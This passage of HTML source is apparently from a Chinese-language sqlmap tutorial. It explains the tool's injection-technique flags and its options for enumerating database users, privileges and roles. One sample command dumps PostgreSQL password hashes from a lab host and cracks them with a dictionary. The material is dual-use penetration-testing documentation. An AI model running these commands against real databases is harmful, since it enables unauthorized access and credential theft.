Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u4e9b\u65f6\u5019\u7528\u6237\u77e5\u9053\u771f\u6761\u4ef6\u4e0b\u7684\u8fd4\u56de\u9875\u9762\u4e0e\u5047\u6761\u4ef6\u4e0b\u8fd4\u56de\u9875\u9762\u662f\u4e0d\u540c\u4f4d\u7f6e\u5728\u54ea\u91cc\u53ef\u4ee5\u4f7f\u7528<span>&#8211;text-only<\/span><span>\uff08<\/span><span>HTTP<\/span><span>\u54cd\u5e94\u4f53\u4e2d\u4e0d\u540c\uff09<\/span><span>&#8211;titles<\/span><span>\uff08<\/span><span>HTML<\/span><span>\u7684<\/span><span>title<\/span><span>\u6807\u7b7e\u4e2d\u4e0d\u540c\uff09\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E6%B3%A8%E5%85%A5%E6%8A%80%E6%9C%AF\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u6ce8\u5165\u6280\u672f<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%B5%8B%E8%AF%95%E6%98%AF%E5%90%A6%E6%98%AF%E6%B3%A8%E5%85%A5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6d4b\u8bd5\u662f\u5426\u662f\u6ce8\u5165<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;technique<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd9\u4e2a\u53c2\u6570\u53ef\u4ee5\u6307\u5b9a<span>sqlmap<\/span><span>\u4f7f\u7528\u7684\u63a2\u6d4b\u6280\u672f\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u4f1a\u6d4b\u8bd5\u6240\u6709\u7684\u65b9\u5f0f\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u652f\u6301\u7684\u63a2\u6d4b\u65b9\u5f0f\u5982\u4e0b\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">B:&nbsp;Boolean-based&nbsp;blind&nbsp;SQL&nbsp;injection<span>\uff08\u5e03\u5c14\u578b\u6ce8\u5165\uff09<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">E:&nbsp;Error-based&nbsp;SQL&nbsp;injection<span>\uff08\u62a5\u9519\u578b\u6ce8\u5165\uff09<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">U:&nbsp;UNION&nbsp;query&nbsp;SQL&nbsp;injection<span>\uff08\u53ef\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff09<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">S:&nbsp;Stacked&nbsp;queries&nbsp;SQL&nbsp;injection<span>\uff08\u53ef\u591a\u8bed\u53e5\u67e5\u8be2\u6ce8\u5165\uff09<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">T:&nbsp;Time-based&nbsp;blind&nbsp;SQL&nbsp;injection<span>\uff08\u57fa\u4e8e\u65f6\u95f4\u5ef6\u8fdf\u6ce8\u5165\uff09<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9A%E5%BB%B6%E8%BF%9F%E6%B3%A8%E5%85%A5%E7%9A%84%E6%97%B6%E9%97%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9a\u5ef6\u8fdf\u6ce8\u5165\u7684\u65f6\u95f4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;time-sec<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u4f7f\u7528\u7ee7\u7eed\u65f6\u95f4\u7684\u76f2\u6ce8\u65f6\uff0c\u65f6\u523b\u4f7f\u7528<span>&#8211;time-sec<\/span><span>\u53c2\u6570\u8bbe\u5b9a\u5ef6\u65f6\u65f6\u95f4\uff0c\u9ed8\u8ba4\u662f<\/span><span>5<\/span><span>\u79d2\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9AUNION%E6%9F%A5%E8%AF%A2%E5%AD%97%E6%AE%B5%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9aUNION\u67e5\u8be2\u5b57\u6bb5\u6570<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;union-cols<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>sqlmap<\/span><span>\u6d4b\u8bd5<\/span><span>UNION<\/span><span>\u67e5\u8be2\u6ce8\u5165\u4f1a\u6d4b\u8bd5<\/span><span>1-10<\/span><span>\u4e2a\u5b57\u6bb5\u6570\uff0c\u5f53<\/span><span>&#8211;level<\/span><span>\u4e3a<\/span><span>5<\/span><span>\u7684\u65f6\u5019\u4ed6\u4f1a\u589e\u52a0\u6d4b\u8bd5\u5230<\/span><span>50<\/span><span>\u4e2a\u5b57\u6bb5\u6570\u3002\u8bbe\u5b9a<\/span><span>&#8211;union-cols<\/span><span>\u7684\u503c\u5e94\u8be5\u662f\u4e00\u6bb5\u6574\u6570\uff0c\u5982\uff1a<\/span><span>12-16<\/span><span>\uff0c\u662f\u6d4b\u8bd5<\/span><span>12-16<\/span><span>\u4e2a\u5b57\u6bb5\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9AUNION%E6%9F%A5%E8%AF%A2%E4%BD%BF%E7%94%A8%E7%9A%84%E5%AD%97%E7%AC%A6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9aUNION\u67e5\u8be2\u4f7f\u7528\u7684\u5b57\u7b26<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;union-char<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>sqlmap<\/span><span>\u9488\u5bf9<\/span><span>UNION<\/span><span>\u67e5\u8be2\u7684\u6ce8\u5165\u4f1a\u4f7f\u7528<\/span><span>NULL<\/span><span>\u5b57\u7b26\uff0c\u4f46\u662f\u6709\u4e9b\u60c5\u51b5\u4e0b\u4f1a\u9020\u6210\u9875\u9762\u8fd4\u56de\u5931\u8d25\uff0c\u800c\u4e00\u4e2a\u968f\u673a\u6574\u6570\u662f\u6210\u529f\u7684\uff0c\u8fd9\u662f\u4f60\u53ef\u4ee5\u7528<\/span><span>&#8211;union-char<\/span><span>\u53ea\u5b9a<\/span><span>UNION<\/span><span>\u67e5\u8be2\u7684\u5b57\u7b26\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BA%8C%E9%98%B6SQL%E6%B3%A8%E5%85%A5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4e8c\u9636SQL\u6ce8\u5165<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;second-order<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u4e9b\u65f6\u5019\u6ce8\u5165\u70b9\u8f93\u5165\u7684\u6570\u636e\u770b\u8fd4\u56de\u7ed3\u679c\u7684\u65f6\u5019\u5e76\u4e0d\u662f\u5f53\u524d\u7684\u9875\u9762\uff0c\u800c\u662f\u53e6\u5916\u7684\u4e00\u4e2a\u9875\u9762\uff0c\u8fd9\u65f6\u5019\u5c31\u9700\u8981\u4f60\u6307\u5b9a\u5230\u54ea\u4e2a\u9875\u9762\u83b7\u53d6\u54cd\u5e94\u5224\u65ad\u771f\u5047\u3002<span>&#8211;second-order<\/span><span>\u540e\u95e8\u8ddf\u4e00\u4e2a\u5224\u65ad\u9875\u9762\u7684<\/span><span>URL<\/span><span>\u5730\u5740\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E5%88%97%E6%95%B0%E6%8D%AE\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u5217\u6570\u636e<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%A0%87%E5%BF%97\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6807\u5fd7<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-b,&#8211;banner<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5927\u591a\u6570\u7684\u6570\u636e\u5e93\u7cfb\u7edf\u90fd\u6709\u4e00\u4e2a\u51fd\u6570\u53ef\u4ee5\u8fd4\u56de\u6570\u636e\u5e93\u7684\u7248\u672c\u53f7\uff0c\u901a\u5e38\u8fd9\u4e2a\u51fd\u6570\u662f<span>version()<\/span><span>\u6216\u8005\u53d8\u91cf<\/span><span>@@version<\/span><span>\u8fd9\u4e3b\u8981\u53d6\u51b3\u4e0e\u662f\u4ec0\u4e48\u6570\u636e\u5e93\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E7%94%A8%E6%88%B7\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u7528\u6237<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-current-user<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728\u5927\u591a\u6570\u636e\u5e93\u4e2d\u53ef\u4ee5\u83b7\u53d6\u5230\u7ba1\u7406\u6570\u636e\u7684\u7528\u6237\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5f53\u524d\u6570\u636e\u5e93<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;current-db<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd4\u8fd8\u5f53\u524d\u8fde\u63a5\u7684\u6570\u636e\u5e93\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%BD%93%E5%89%8D%E7%94%A8%E6%88%B7%E6%98%AF%E5%90%A6%E4%B8%BA%E7%AE%A1%E7%90%86%E7%94%A8\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5f53\u524d\u7528\u6237\u662f\u5426\u4e3a\u7ba1\u7406\u7528<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;is-dba<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5224\u65ad\u5f53\u524d\u7684\u7528\u6237\u662f\u5426\u4e3a\u7ba1\u7406\uff0c\u662f\u7684\u8bdd\u4f1a\u8fd4\u56de<span>True<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E7%94%A8%E6%88%B7\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u6570\u636e\u5e93\u7ba1\u7406\u7528\u6237<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;users<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u7528\u6237\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c\u5c31\u53ef\u4ee5\u5217\u51fa\u6240\u6709\u7ba1\u7406\u7528\u6237\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E5%87%BA%E5%B9%B6%E7%A0%B4%E8%A7%A3%E6%95%B0%E6%8D%AE%E5%BA%93%E7%94%A8%E6%88%B7%E7%9A%84hash\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u51fa\u5e76\u7834\u89e3\u6570\u636e\u5e93\u7528\u6237\u7684hash<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;passwords<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u7528\u6237\u5bc6\u7801\u7684\u5f6a\u7684\u6743\u9650\u65f6\uff0c<span>sqlmap<\/span><span>\u4f1a\u73b0\u5217\u4e3e\u51fa\u7528\u6237\uff0c\u7136\u540e\u5217\u51fa<\/span><span>hash<\/span><span>\uff0c\u5e76\u5c1d\u8bd5\u7834\u89e3\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/pgsql\/get_int.php?id=1&#8221;&nbsp;&#8211;passwords&nbsp;-v&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;PostgreSQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:38]&nbsp;[INFO]&nbsp;fetching&nbsp;database&nbsp;users&nbsp;password&nbsp;hashes<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;use&nbsp;dictionary&nbsp;attack&nbsp;on&nbsp;retrieved&nbsp;password&nbsp;hashes?&nbsp;[Y\/n\/q]&nbsp;y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:42]&nbsp;[INFO]&nbsp;using&nbsp;hash&nbsp;method:&nbsp;&#8216;postgres_passwd&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">what&#8217;s&nbsp;the&nbsp;dictionary&#8217;s&nbsp;location?&nbsp;[\/software\/sqlmap\/txt\/wordlist.txt]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:46]&nbsp;[INFO]&nbsp;loading&nbsp;dictionary&nbsp;from:&nbsp;&#8216;\/software\/sqlmap\/txt\/wordlist.txt&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;use&nbsp;common&nbsp;password&nbsp;suffixes?&nbsp;(slow!)&nbsp;[y\/N]&nbsp;n<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:48]&nbsp;[INFO]&nbsp;starting&nbsp;dictionary&nbsp;attack&nbsp;(postgres_passwd)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:49]&nbsp;[INFO]&nbsp;found:&nbsp;&#8216;testpass&#8217;&nbsp;for&nbsp;user:&nbsp;&#8216;testuser&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;found:&nbsp;&#8216;testpass&#8217;&nbsp;for&nbsp;user:&nbsp;&#8216;postgres&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">database&nbsp;management&nbsp;system&nbsp;users&nbsp;password&nbsp;hashes:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;postgres&nbsp;[1]:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;password&nbsp;hash:&nbsp;md5d7d880f96044b72d0bba108ace96d1e4<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;clear-text&nbsp;password:&nbsp;testpass<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;testuser&nbsp;[1]:<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;password&nbsp;hash:&nbsp;md599e5ea7a6f7c3269995cba3927fd0093<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;&nbsp;&nbsp;&nbsp;clear-text&nbsp;password:&nbsp;testpass<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u770b\u5230<span>sqlmap<\/span><span>\u4e0d\u4ec5\u52d2\u51fa\u6570\u636e\u5e93\u7684\u7528\u6237\u8ddf\u5bc6\u7801\uff0c\u540c\u65f6\u4e5f\u8bc6\u522b\u51fa\u662f<\/span><span>PostgreSQL<\/span><span>\u6570\u636e\u5e93\uff0c\u5e76\u8be2\u95ee\u7528\u6237\u662f\u5426\u91c7\u7528\u5b57\u5178\u7206\u7834\u7684\u65b9\u5f0f\u8fdb\u884c\u7834\u89e3\uff0c\u8fd9\u4e2a\u7206\u7834\u5df2\u7ecf\u652f\u6301<\/span><span>Oracle<\/span><span>\u548c<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e5f\u53ef\u4ee5\u63d0\u4f9b<span>-U<\/span><span>\u53c2\u6570\u6765\u6307\u5b9a\u7206\u7834\u54ea\u4e2a\u7528\u6237\u7684<\/span><span>hash<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E5%91%98%E6%9D%83%E9%99%90\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u6743\u9650<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;privileges<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u7528\u6237\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c\u5f88\u53ef\u80fd\u5217\u4e3e\u51fa\u6bcf\u4e2a\u7528\u6237\u7684\u6743\u9650\uff0c<span>sqlmap<\/span><span>\u5c06\u4f1a\u544a\u8bc9\u4f60\u54ea\u4e2a\u662f\u6570\u636e\u5e93\u7684\u8d85\u7ea7\u7ba1\u7406\u5458\u3002\u4e5f\u53ef\u4ee5\u7528<\/span><span>-U<\/span><span>\u53c2\u6570\u6307\u5b9a\u4f60\u60f3\u770b\u54ea\u4e2a\u7528\u6237\u7684\u6743\u9650\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E5%91%98%E8%A7%92%E8%89%B2\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u89d2\u8272<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;roles<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u8bfb\u53d6\u5305\u542b\u6240\u6709\u7528\u6237\u7684\u8868\u7684\u6743\u9650\u65f6\uff0c\u5f88\u53ef\u80fd\u5217\u4e3e\u51fa\u6bcf\u4e2a\u7528\u6237\u7684\u89d2\u8272\uff0c\u4e5f\u53ef\u4ee5\u7528<span>-U<\/span><span>\u53c2\u6570\u6307\u5b9a\u4f60\u60f3\u770b\u54ea\u4e2a\u7528\u6237\u7684\u89d2\u8272\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4ec5\u9002\u7528\u4e8e\u5f53\u524d\u6570\u636e\u5e93\u662f<span>Oracle<\/span><span>\u7684\u65f6\u5019\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" 